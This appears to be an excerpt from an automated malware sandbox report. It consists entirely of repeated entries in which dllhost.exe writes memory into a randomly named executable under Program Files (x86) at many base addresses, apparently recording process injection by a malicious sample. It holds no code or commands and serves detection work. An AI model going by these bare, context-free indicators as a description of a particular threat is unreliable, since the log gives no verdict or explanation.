Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000
